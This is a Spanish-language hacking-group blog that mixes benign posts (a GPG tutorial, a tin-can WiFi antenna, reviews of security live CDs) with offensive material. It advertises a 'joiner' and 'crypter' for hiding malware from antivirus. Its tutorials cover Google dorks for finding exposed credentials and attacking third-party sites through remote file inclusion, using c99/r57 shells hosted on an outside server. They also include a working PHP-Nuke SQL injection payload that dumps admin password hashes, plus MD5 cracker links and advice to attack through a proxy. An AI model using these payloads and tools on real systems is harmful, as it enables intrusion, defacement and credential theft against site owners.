Pirates of the routers security team

NUEVA PAGINA

2009-12-16T07:57:00.001-08:00

Saludos a tod@s los visitantes del blog. Nos hemos trasladado a una nueva página con foro, la dirección es la siguiente:

Pirates of the routers

Pirates Of The Routers - Crypt

2009-12-10T16:30:00.000-08:00

Codeado para Pirates Of The Routers

Coder: GodHack

Info: 100% Runtime + Scantime

Compilado en VB6

Escaneado : http://virusscan.jotti.org/es/scanresult/a177bb5980a263969db63a7ba5b0cce18f4756b6

APLICACIONES PIRATES OF THE ROUTERS

2009-12-10T16:27:00.000-08:00

BUENO COMPAÑEROS, DESPUES DE UN TIEMPO OFFLINE PIRATES OF THE ROUTERS VUELVE Y MAS FUERTE QUE NUNCA NOS HEMOS PROPUESTO CREAR SOFTWARE.

PIRATES JOINER V 1.0

Joiner para juntar archivo (perfecto para ocultar malwares)

PIRATES OF THE ROUTERS CRYPT

Crypter para que no detecten tus malware

Y esto no es todo por que dentro de poco nos espera muuuuchoooo mas!

2009-06-27T19:48:00.000-07:00

Faltaba mi imagen jajaja

Dibujo nuevo :)

2009-04-15T11:41:00.000-07:00

Gracias a mi compañero de clase, cursillos y trabajo os presento aquí el pedazo de dibujo que se ha currado para nosotros :)
Si en el fondo aunque sea un poco capullo es majo jaja este apartado va dedicado a el!!!

2009-04-05T03:48:00.000-07:00

GOOGLE HACKING
por iLuN

Google es el buscador mas famoso y tecnológicamente mas avanzado que hay hoy en día. Como todos sabemos Google nos permite hacer búsquedas de información mediante palabras, pero no solo eso, también nos permite encontrar información sensible.

¿Entonces, en que consiste el google hack?

Resumiendo, Google hacking es el metodo de busqueda por el cual encontramos información sensible.

Métodos de Google hack

Pasemos a la parte practica, vamos a realizar unas cuantas búsquedas de información sensible:
Para ello debemos escribir el código que pongo debajo de el texto subrayado en el buscador.

1.- Productos vulnerables

"Powered by MercuryBoard [v1"

2.-Mensajes de error

"Warning: mysql_query()" "invalid query"

3.-Ficheros que contienen información sensible

"Index of" / "chat/logs"

4.-Ficheros que contienen claves

ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"

5.-Ficheros que contienen nombres de usuario

filetype:conf inurl:proftpd.conf -sample

/* Yo este es el que mas uso, porque si os dais cuenta con esta busqueda encontramos la información sensible del servidor y si sabemos algo de linux ( en mi caso lo que utilizo) podemos divertirnos mucho).

Os voy a dar una pista, dos archivos de configuración importantes en linux:
-password.conf
-shadow.conf

Ale a investigar un poco como lo hariamos, no todo hiba a ser tan sencillo no? Asi que a estrujar la mente caballeros y señoritas :)
*/

6.-Footholds e información de apoyo al acceso

+htpasswd +WS_FTP.LOG filetype:log

7.-Páginas con formularios de acceso

"You have requested access to a restricted area of our website. Please authenticate yourself to continue."

8.-Páginas que contienen datos relativos a vulnerabilidades

filetype:pdf "Assessment Report" nessus

9.-Directorios sensibles

filetype:cfg ks intext:rootpw -sample -test -howto

10.-Información sensible sobre comercio y banca electrónica

inurl:shopdbtest.asp

11.-Dispositivos hardware online

camera linksys inurl:main.cgi

12.-Ficheros vulnerables

intitle:"Directory Listing" "tree view"

13.-Servidores vulnerables

intitle:"Mail Server CMailServer Webmail" "5.2"

14.-Detección de servidores web

intitle:"Welcome to Windows Small Business Server 2003"

Protegernos de Google hack!

Como todo ataque tiene su defensa este no va a ser menos...

1.Asegurare de tener un fichero de robots.txt bien configurado.
2.Aprende como funciona el mecanismo de posicionamiento de resultados en Google.
3.Si eres Administrador de sistemas prueba a usar un honeypot especializado. Para este tipo de ataques usa Google Hack Honeypot. (Suelo odiar este tipo de cosas peroooo si queremos protegernos hay que ser mas listos que el hambre xD)

Fuentes:
http://www.sahw.com/

Y para terminar ... ya sabéis que este manual esta hecho para la educación no para andar jodiendo por hay.

Antena Wifi casera

2009-04-03T13:13:00.000-07:00

CONSTRUCCIÓN DE UNA ANTENA WIFI SIMPLE
por iLuN

HERRAMIENTAS

a) Tarjeta Wifi USB

b) Alargador USB

c) Lata de conservas ( tomate ...) de tamaño grande

d) Cinta aislante

CREACIÓN

1.- Primero hacemos un agujero en la lata de conservas como en la foto de arriba. (Mas o menos a la
misma distancia del culo de la lata)
2.- Metemos la tarjeta Wifi por el agujero de tal forma que quede mas o menos encajado.
3.- Por ultimo con la cinta nos aseguramos de que la tarjeta no se caiga.

CURIOSIDADES

Colocando la tarjeta en la lata ganamos 10 db. Donde vivo ( mi balcón da a una plaza) antes del
invento solo veía 10 redes, ahora veo exactamente 23 redes mínimo y 31 máximo.

NimbleX, Crea tu Propio Live CD personalizado en SEGUNDOS

2008-12-20T12:26:00.000-08:00

NimbleX podría ser una simple distribución de GNU/Linux pero ha integrado entre sus opciones de descargas la posibilidad de tener la distribución NimbleX PERSONALIZADA y como live cd.

Podrás desde cambiarle el wallpaper, hasta seleccionar los paquetes que quieres que tenga.

Muy útil si queremos un live cd Personalizado.

Para descargar tu NimbleX Personalizado puedes entrar a:
custom.nimblex.net

Para descargar el NimbleX normal
nimblex.net

Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web

2008-12-20T12:07:00.000-08:00

Samurai Web Testing Framework es un entorno de trabajo basado en GNU/LINUX UBUNTU, que ha sido pre-configurado para llevar a cabo test de penetracion a aplicativos Web.

Este LiveCD, que además puede ser instalado como sistema operativo por defecto en el disco duro, contiene un repertorio bastante amplio en cuanto a herramientas de libre uso y distribución se refiere. Estas herramientas están destinadas a realizar pen-testing sobre aplicativos Webs.

Al igual que la distribución BackTrack, Samurai Web Testing Framework divide las herramientas por grupos según una metodología.

Comienza por la etapa de rexonicimiento, para ello hace uso de las herramientas Fierce domain Scanner y Maltego. Para el mapeo del sistema objetivo incluye la herramienta WebScarab y Ratproxy. Para el decubrimiento de vulnerabilidades incluye w3af y burp, finalmente para el proceso de explotación utiliza BeEF, AJAXShell y otras más.

Como si esto fuera poco, Samurai Framework incluye una wiki preconfigurada y lista para ser usada como bitácora de recolección de la información que vamos generando a medida que avanzamos en el proceso de pen-testing.

Los desarrolladores hacen anuncio oficial de la disponibilidad de esta primera distribución como versión de desarrollo y hacen la invitación a los interesados a participar de este genial proyecto, ofrecen para ello un sitio Web y una lista de correo.

Para finalizar dejo algunas capturas de pantalla de lo que he probado a manera “superficial” sin entrar aún mucho en el detalle de uso y comportamiento del sistema (hasta el momento va muy bien). Quiero además hacer la salvedad que estas mismas herramientas pueden ser instaladas y configuradas en diferentes S.O, por lo tanto una vez más queda comprobado que no importa el S.O que utilicemos, todos pueden servir para las diferentes tareas de nuestro día a día, incluso para estos menesteres de la seguridad

Booteo de Samurai Web Testing Framework

Cargando y reconociendo componenetes y hardware

Inicio de sesión (contraseña para root)

Escritorio (Gnome)

Menú Samurai (Herramientas)

Navegador (Add-ons incluídos: Edit cookies, DOM Inspector, Firebug, Greasemonkey, HackBar, Header Spy, SQL Injection, etc)

Herramienta WebScarab

Terminal

Wiki incluida y pre-configurada

Ejecución del instalador a disco duro

Web oficial del Proyecto Samurai Web Testing Framework
Descargar Samurai Web Testing Framework (Directa)

Introducción Defaces

2008-12-17T14:26:00.000-08:00

INTRODUCCIÓN DEFACES

Quiero dar un pequeña introducción antes de explicar tipos de defaces y como proteger una pagina.
Una deface es mediante un bug del codigo de una pagina web conseguir hacer lo que te propones a esa pagina web, redireccionarla a otra web, robo de cookies, modificación de información ...
Explicaré 3 tipos de defaces:
RFI (Remote file inclusion)
XSS (Cross site scripting)
SQL injection

Explicaré cada tipo, pondré un ejemplo de su uso, y intentaré demostrar formas de protección ante esos tipos de ataques.

TUTORIAL RFI

por iLuN

Este tutorial ha sido hecho por iLuN para el blog de http://pirates-of-the-routers.blogspot.com

No me hago responsable de los actos que hagais mediante los conocimientos adquiridos con este tutorial. Este tutorial es solo educativo nada mas.

1.- Que es RFI?

La tecnica de RFI (Remote file inclusion) consiste en explotar una vulneravilidad de PHP por un fallo de programación en el codigo. La inclusión de ficheros suele exportarse mediante el metodo GET y el metodo POST, los cuales son metodos de transferencia de datos al servidor web donde esta alojada la pagina.

La manera de saber si la pagina está usando un metodo GET es viendo en la barra de direcciones del navegador algo parecido a esto:

http://www.pagina.com/archivo.php?var1=dato1

Normalmente el error en la programación viene dado al utilizar la función include de PHP.

Include “fichero”;

Esta explicación deja las cosas un poco sueltas, pero ahora lo veremos mejor.

2.- Manos a la obra con RFI

Lo primero que hay que hacer es buscar una web vulnerable a RFI, para ello en google ponemos las siguientes busquedas o similares, por ejemplo:

default.php?page= inurl:"default.php?page="

folder.php?id= inurl:"folder.php?id="

index.php?Load= inurl:"index.php?Load="

index.php?Language= inurl:"index.php?Language="

hall.php?file= inurl:"hall.php?file="

hall.php?page= inurl:"hall.php?page="

Lo siguiente es asegurarse de que la pagina es vulnerable a RFI, para ello en la url insertamos otra url, es decir:

http://webvuln.com/index.php?Load=www.google.es

Lo que acabamos de hacer es insertar en la url de la web vulnerable otra direccion, si la pagina de google carga, la web es vulnerable.

Vale, pero direis que con esto no conseguimos gran cosa, pero y si insertamos la url de una shell que tengamos alojada en otro servidor?. Una shell lo que nos permite es poder ejecutar comandos en el servidor de la web vulnerable, con lo que podrias hacer mucha pupita.

Las shell que uso son las siguientes:

c99, c100 y r57

Vale, repasemos. Una vez descubramos la pagina vulnerable a RFI tenemos que subir o tener subida un shell (c99,c100,r57...) a un servidor, es muy muy muy importante que subamos la shell con extension txt, para que no se ejecute en nuestro servidor donde tenemos la shell.

Ahora tenemos que atacar la pagina vulnerable de la siguiente manera:

[http://webvuln.com/index.php?Load=http://servidordelashell/shell.txt]

ejemplo:

[http://www.webvuln.com/index.php?Load=http://iLuN.com/c99.txt]

Si queremos ejecutar directamente un comando pondriamos lo siguiente:

[http://www.webvuln.com/index.php?Load=http://iLuN.com/c99.txt&&cmd ="comando"]

Es importante saber que la mayoria de los webmasters protegen sus paginas contra este tipo de ataques. Ahora explicare la forma de proteger una pagina a RFI.

3.-Proteger la pagina a RFI

El texto que a continuación os presento es un post de un usuario (en este caso moderador global) del foro de el hacker, si quereis ver pinchar en el siguiente enlace:

[http://foro.el-hacker.com/index.php/topic,145634.0.html]

ManCuerTex:

“Pues una de las soluciones mas sencillas del mundo, es crear un mini filtro, para decirle a nuestra página, que secciones pueden pasar por la variable sección.

Es tan facil como crear un array y indicarle las páginas.

Ejemplo:

[$seccion=array("info.html", "index.html", "seccion2.html");]

Otro filtro que es el que sea usa mucho, es el deshabilitar los dos puntos ( en las variables de entrada como $seccion.

¿Para que queremos que se use el caracter de los dos puntos?

Para nada, no nos puede traer nada bueno, ya que lo utilizan los atacantes para poner HTTP://

Así que creamos otro minifiltro para prohibir los ( dentro de la variable.

Ejemplo:

Bueno, es tan facil como eso.

Y como último, opción preventiva, que a veces puede causar la incompatibilidad en algunas configuraciones.

Vamos al archivo php.ini y modificamos el valor "allow_url_fopen", lo dejamos a "0".

Esto del php.ini no se puede modificar en la mayoría de servidores, ya que los servidores que se contratan, ya tienen sus propias políticas de seguridad, y tienen el archivo php.ini configurado como ellos quieren, por eso lo he puesto en el final y sin mucha importancia. Porque metiendo los filtros aquí dichos en nuestra página, ya podemos decirle Adios al RFI.”

Me parece interesante el aporte de ManCuerText, por su claridad y su entendimiento. Como acabais de leer la solucion al RFI no es complicada de entender, ahora para proteger vuestras paginas de RFI esta en vuestras manos.

Esto ha sido todo :) Nos vemos en el proximo tutorial.

TUTORIAL XSS
por iLuN

Por razones curiosas, pero ciertas no puedo postear aquí este tutorial. La razon? xD Blogspot es vulnerable a XSS, me di cuenta ayer cuando lo postee. La solución que se me a ocurrido es subir el manual a rapidshare. El problema es que esta en .odt formato de open ofice asi que pongo aqui un link donde lo prodreis pasar a formato de word. Merece la pena ver el tuto.

DESCARGAR TUTORIAL -----> http://rapidshare.com/files/189803049/XSS.odt.html

CONVERSOR -----> http://www.zamzar.com/conversionTypes.php#documents
http://media-convert.com/conversion/

Las dos paginas son muy buenas. Ya me fastidia lo ocurrido, haber si lo arreglan pronto jaja porque yo mismo conozco la pereza de tener que bajarselo y convertilo. Pero bueno he dado las mayores comodidades que he podido ya lo siento :) Pero la culpa la tiene google jajajaja.

TUTORIAL SQL INJECTION BASICO
por iLuN

1.-Introducción

SQL injection es un tipo de ataque con el que se pretende sacar información o modificarla de una base de datos. Este ataque se aprobecha del filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL.

Como siempre la explicación es un poco abstracta asi que lo vereis mejor en el transcurso de l tutorial.

Solo explicar a los que no sepan lo que es SQL, que es un lenguaje de manipulación de datos de una base de datos, digamos que con SQL hacemos consultas a una tabla, creamos tablas … para mas información esta San Wikipedia.

Para que cojais una idea los que nunca habeis visto el lenguaje SQL que una sentencia facilita es de este pelo:

select * from usuarios where nombre='admin';

Lo que decimos es que seleccione todo (*) de la tabla usuarios donde el nombre (campo de esa tabla) es admin. Esto nos daria toda su información, y puede que esta contenga la pass.

2.- Al tema con SQL injection!

El ataque que voy a enseñar es uno de los mas sencillos de hacer. Solo demostrare como encontrar una pagina vulnerable y como sacar la información de esta. Una vez tengas la información tendras que jugar con tu cerebro para hacerle lo que quieras a la pagina.

Lo primer que tenemos que hacer es buscar una web vulnerable a SQL injection, bien pues vamos a el buscador de yahoo:

http://es.search.yahoo.com/web?fr=yfp-t-501

Y una vez dentro buscamos con el siguiente codigo:

modules.php?name=Statistics Version PHP-Nuke

Al darle a buscar nos apareceran paginas en PHP nuke que son las vulnerables al ataque que vamos a realizar ahora, pero no desespereis muchas están solucinadas.

Lo siguiente es probar haber si la pagina que estamos visitando es vulnerable, para ello insertamos en la url lo siguiente:

modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

de tal forma que si la url es:

www.webvul.com/modules.php?=

quedaria de esta forma:

www.webvul.com/modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

Si la web es vulnerable te dará el nombre de los usuarios y la contraseña en MD5.

Por ultimo solo tenemos que ir a un crackeado de MD5 para buscar la contraseña, por ejemplo:

http://md5.rednoize.com/
http://passcracking.com/index.php
http://www.milw0rm.com/cracker/info.php
http://www.xmd5.net/index_en.htm
http://shm.hard-core.pl/md5/
http://www.csthis.com/md5/index.php
http://gdataonline.com/
http://md5.benramsey.com/

Una vez tengamos el nombre de usuario y la contraseña crackeada solo tenemos que loguearnos en la pagina como ese usuario y hacer volar nuestra imaginación.

Aviso: Utilizar un proxy antes de hacer estos ataques y una pista los usuarios administradores o el usuario administrador son los primeros de la lista :)

3.-Proteger nuestra pagina de ataques SQL injection

Como siempre os pongo la opinión de un experto en materia :), aquí os dejo la solución que da David Rodrigez sobre proteger la pagina ante estos tipos de ataques:

http://blogdavidrodriguez.piensaennaranja.com/2008/06/16/proteger-pagina-web-contra-sql-injection/

Y ya sabeis proteger vuestra pagina esta en vuestras manos pero el dañarla en la de los otros :)

4.-Despedida

Este tutorial os habra parecido mas soso que los anteriores pero la explicacíon es sencilla. Si haria un tutorial sobre SQL injection avanzado los que no sepan lenguaje SQL se perderian asi que les dejo un poco de tregua con este tutorial a la espera del fuerte :)

Fuentes:

http://blogdavidrodriguez.piensaennaranja.com

CAINE, LiveCD GNU/Linux para Informática Forense

2008-12-17T11:51:00.000-08:00

CAINE (Computer Aided INvestigative Environment), es una distribución GNU/Linux en modo LiveCD creada por Giancarlo Giustini como un proyecto de Informática Forense (Forense Digital) para el Centro de Investigación en Seguridad (CRIS), con el apoyo de la Universidad de Modena y Reggio Emilia.

El proyecto CAINE (Computer Aided INvestigative Environment) no pretende ser una nueva herramienta forense o framework de recopilación de ellas, pues este tipo de distribuciones ya existen (ej. Felix FCCU, Deft, entre otras). CAINE propone como novedad un nuevo entorno de fácil uso para todo este tipo de herramientas. Además introduce nuevas características importantes, que aspiran a llenar el vacio de interoperabilidad a través de diferentes herramientas forenses, ya que proporciona una interfaz gráfica homogénea que guía a los investigadores digitales durante la adquisición y el análisis de las pruebas electrónicas, y ofrece un proceso semi-automático durante la documentación y generación de informes y resultados.

El proyecto CAINE proporciona al usuario las siguientes principales novedades:

* Fácil interoperabilidad durante todo el análisis (Preservación, Recolección, Análisis, Reportes).
* Amigable entorno gráfico.
* Ubuntu como sistema base, ello implica un fácil uso y fácil instalación o adaptación sobre nuestro entorno de trabajo.
* Generación semi-automática de reportes.

Algunas herramientas incluídas:

* Grissom Analyzer
* Automated Image & Restore (AIR)
* Guymager
* Foremost and Scalpel
* Autopsy 2.20 and TSK 3.0
* SFDumper
* Fundl
* Stegdetect
* Ophcrack

Capturas de pantalla de CAINE (Computer Aided INvestigative Environment)

Pagina Oficial del Proyecto

descargar CAINE

Maquina Virtual desarrollada para VMware WorkStation o VMware Player

Cifrado con GPG

2008-12-12T12:12:00.000-08:00

CIFRADO CON GPG

creado por iLuN

Segun lo que dice nuestra querida wikipedia:
GPG o GNU Privacy Guard es una herramienta para cifrado y firmas digitales, que viene a ser un reemplazo del PGP (Pretty Good Privacy) pero con la principal diferencia que es software libre licenciado bajo la GPL. GPG utiliza el estándar del IETF denominado OpenPGP.

GPG es estable, calificado como un software para el uso en producción y es comúnmente incluido en los sistemas operativos como FreeBSD, OpenBSD, NetBSD y últimamente con todas las distribuciones GNU/Linux.

Aunque básicamente el programa tiene una interfaz textual, actualmente hay varias aplicaciones gráficas que utilizan recursos de GPG.

GPG cifra los mensajes usando pares de claves individurales asimetricas generadas por los usuarios, es decir, utiliza el "metodo" de seguridad de clave publica y clave privada.

Una breve y no tan detallada explicación sería la siguiente:
Si queremos que alguien lea un mensaje nuestro que hemos encriptado le tenemos que mandar nuestra clave publica, y el con nuestra clave publica y su privada desencriptada el mensaje que le hemos enviado.
Esta explicación se entendra mas adelante con una demostración que presento a continuación.

Despues de esta introducción sobre el GPG mostramos a continuación su uso en un equipo OpenSuSE 11.0 en el cual el programa ya viene incorporado.

1.- Creamos las claves publica y privada en nuestro equipo, para ello seguimos los siguientes pasos.

Abrimos nuestra consola o shell y escribimos lo siguiente: (Estando como root)

#gpg --gen-key

SALE LO SIGUIENTE:

linux-nrop:/home/ilun # gpg --gen-key
gpg (GnuPG) 2.0.9; Copyright (C) 2008 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Por favor seleccione tipo de clave deseado:
(1) DSA y ElGamal (por defecto)
(2) DSA (sólo firmar)
(5) RSA (sólo firmar)
Su elección:

Usaremos la opción por defecto.

Su elección: 1
El par de claves DSA tendrá 1024 bits.
las claves ELG pueden tener entre 1024 y 4096 bits de longitud.
¿De qué tamaño quiere la clave? (2048)

Utilizaremos el tamaño por defecto

El tamaño requerido es de 2048 bits
Por favor, especifique el período de validez de la clave.
0 = la clave nunca caduca
= la clave caduca en n días
w = la clave caduca en n semanas
m = la clave caduca en n meses
y = la clave caduca en n años
¿Validez de la clave (0)?

Elegiremos la opción de la clave nunca caduca y decimos que es correcto.

¿Validez de la clave (0)? 0
La clave nunca caduca
¿Es correcto? (s/n) s

Necesita un identificador de usuario para identificar su clave. El programa
construye el identificador a partir del Nombre Real, Comentario y Dirección
de Correo Electrónico de esta forma:
"Heinrich Heine (Der Dichter) "

Nombre y apellidos:

Insertamos los datos que nos piden a continuación.

Nombre y apellidos: iLuNPr
Dirección de correo electrónico: ilun.pr@gmail.com
Comentario: Pirates Of The Routers
Ha seleccionado este ID de usuario:
"iLuNPr (Pirates Of The Routers) "
¿Cambia (N)ombre, (C)omentario, (D)irección o (V)ale/(S)alir?

Y por ultimo le damos a Vale (V)
¿Cambia (N)ombre, (C)omentario, (D)irección o (V)ale/(S)alir? v
Necesita una frase contraseña para proteger su clave secreta

Ahora nos saldrá una pantalla donde pondremos nuestra clave privada... y aceptamos

Es importante trabajar con el equipo, abriendo ventanas etc para que la clave coja un valor aleatorio como dirá a continuación.

Es necesario generar muchos bytes aleatorios. Es una buena idea realizar
alguna otra tarea (trabajar en otra ventana/consola, mover el ratón, usar
la red y los discos) durante la generación de números primos. Esto da al
generador de números aleatorios mayor oportunidad de recoger suficiente
entropía.

Una vez creada salran los datos correspondientes.

Para ver las claves que contenemos ponemos el siguiente comando:

#gpg --list-keys

Y nos saldrá una lista de las claves creadas e importadas.

2.- Cifrar archivos

Para cifrar archivos ponemos el siguiente comando:

#gpg -a -o [nombre_queramosNombre] -er [email] [archivo_a_cifrar]

Ejemplo:

linux-nrop:/home/ilun/cifrados # gpg -a -o passwd_crypted -er ilun.pr@gmail.com passwd
linux-nrop:/home/ilun/cifrados # ls
passwd passwd_crypted

Aqui tenemos el archivo passwd, que era el que queriamos encriptar y ahora se ha creado el archivo passwd_crypted que le hemos llamado así.

Como es logico y normal borramos el archivo no encriptado...

Para ello:

#rm passwd

3.- Descrifrar archivos

Es tan facil como antes, solo tenemos que poner el siguiente comando:

#gpg -a -o [como_queremosNombre] -d [archivo_cifrado]

Ejem:

linux-nrop:/home/ilun/cifrados # gpg -a -o passwd_des -d passwd_crypted
gpg: cifrado con clave ELG de 2048 bits, ID D1795C00, creada el 2008-12-12
"iLuNPr (Pirates Of The Routers) "
linux-nrop:/home/ilun/cifrados # ls
passwd_crypted passwd_des

4.- Importar y exportar claves publicas

Para que puedan y poder desencriptar archivos se requiere de la clave publica del creador de ese archivo, por lo que en este apartado os enseñare a exportarla para pasarsela a alguien y como importar una que nos han pasado.

EXPORTAR:

Ponemos el siguiente comando:

#gpg -a -o [nombre_queremosNombre.asc] --export [UID]

[UID]: El correo que hemos insertado en la configuracion del par de claves.

Ejemplo:
linux-nrop:/home/ilun/cifrados # gpg -a -o pk.asc --export ilun.pr@gmail.com
linux-nrop:/home/ilun/cifrados # ls
passwd_crypted passwd_des pk.asc

IMPORTAR:

Ponemos el siguiente comando:

#gpg --import [archivo.asc]

Ejemplo:

#gpg --import compañero.asc

5.- Cifrar y descifrar para otros

CIFRAR:

Ponemos el siguiente comando:

#gpg -a -o [archivo_queremosNombre] -er [destinatario] [archivo_no_encriptado]

[destinatario] : Ponemos el email de nuestro compañero, pero no significa que se lo vaya a enviar.

Ejem: (tenemos que tener su clave publica antes)
linux-nrop:/home/ilun/cifrados # gpg -a -o amigos_encrypt -er amigo@hotmail.com amigos

DESCIFRAR:

Ponemos el siguiente comando:

#gpg -a -o [archivo_queremosNombre] -d [archivo_encriptado]

Ejem:
linux-nrop:/home/ilun/cifrados # gpg -a -o hola -d hola_crypted

USUARIOS DE WINDOWS

Aqui os dejo un link con un tutorial del GPG para windows.

http://holait.blogspot.com/2008/06/manual-de-instalacin-y-uso-de-gpg4win.html

iLuN :)

Bienvenidos!

2008-12-11T01:08:00.000-08:00

BIENVENIDOS AL BLOG DE HACKING DEL TEAM DE SEGURIDAD PIRATES OF THE ROUTERS

PIRATES OF THE ROUTERS Team es un grupo dedicado a la investigación de la Seguridad/Contraseguridad informática y el underground.